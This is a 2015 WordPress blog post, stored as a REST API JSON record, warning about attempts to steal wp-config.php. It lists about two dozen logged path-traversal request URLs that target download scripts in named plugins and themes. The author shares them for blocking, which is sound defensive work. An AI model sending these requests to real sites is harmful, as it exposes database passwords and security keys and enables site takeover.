{"id":1094,"date":"2015-02-16T16:24:35","date_gmt":"2015-02-16T20:24:35","guid":{"rendered":"http:\/\/www.blogseye.com\/?p=1094"},"modified":"2015-02-16T16:24:35","modified_gmt":"2015-02-16T20:24:35","slug":"wp-config-php-exploit-attempts","status":"publish","type":"post","link":"http:\/\/blogseye\/2015\/02\/wp-config-php-exploit-attempts.html","title":{"rendered":"wp-config.php exploit attempts"},"content":{"rendered":"<p>I got a whole bunch of new exploit attempts this weekend. I&#8217;ve added these to the 6.00 Stop Spammer plugin so I should be protected.<\/p>\n<p>The exploit uses insecure plugins and themes to try to download your wp-config file. The file has your security keys and database user and password, so there is potentially some significant stuff there.<\/p>\n<p>watch out for these:<br \/>\n<code style=\"font-size: 75%; font-weight: bold;\"><br \/>\n\/wp-content\/force-download.php?file=..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/plugins\/ajax-store-locator-wordpress_0\/sl_file_download.php?download_file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/plugins\/filedownload\/download.php\/?path=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/plugins\/google-mp3-audio-player\/direct_download.php?file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/plugins\/pica-photo-gallery\/picadownload.php?imgname=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/plugins\/plugin-newsletter\/preview.php?data=..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/plugins\/simple-download-button-shortcode\/simple-download-button_dl.php?file=..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/plugins\/tinymce-thumbnail-gallery\/php\/download-image.php?href=..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/MichaelCanthony\/download.php?file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/Newspapertimes_1\/download.php?filename=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/SMWF\/inc\/download.php?file=..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/TheLoft\/download.php?file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/acento\/includes\/view-pdf.php?download=1&amp;file=..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/churchope\/lib\/downloadlink.php?file=..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/corporate_works\/downloader.php?file_download=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/felis\/download.php?file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/jarida\/download.php?uri=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/lote27\/download.php?download=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/markant\/download.php?file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/parallelus-mingle\/framework\/utilities\/download\/getfile.php?file=..\/..\/..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/parallelus-salutation\/framework\/utilities\/download\/getfile.php?file=..\/..\/..\/..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/tess\/download.php?file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/yakimabait\/download.php?file=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n\/wp-content\/themes\/ypo-theme\/download.php?download=..\/..\/..\/wp-config.php HTTP\/1.1<br \/>\n<\/code><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I got a whole bunch of new exploit attempts this weekend. I&#8217;ve added these to the 6.00 Stop Spammer plugin so I should be protected. The exploit uses insecure plugins and themes to try to download your wp-config file. The file has your security keys and database user and password, so there is potentially some [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/posts\/1094"}],"collection":[{"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/comments?post=1094"}],"version-history":[{"count":1,"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/posts\/1094\/revisions"}],"predecessor-version":[{"id":1095,"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/posts\/1094\/revisions\/1095"}],"wp:attachment":[{"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/media?parent=1094"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/categories?post=1094"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/blogseye\/wp-json\/wp\/v2\/tags?post=1094"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}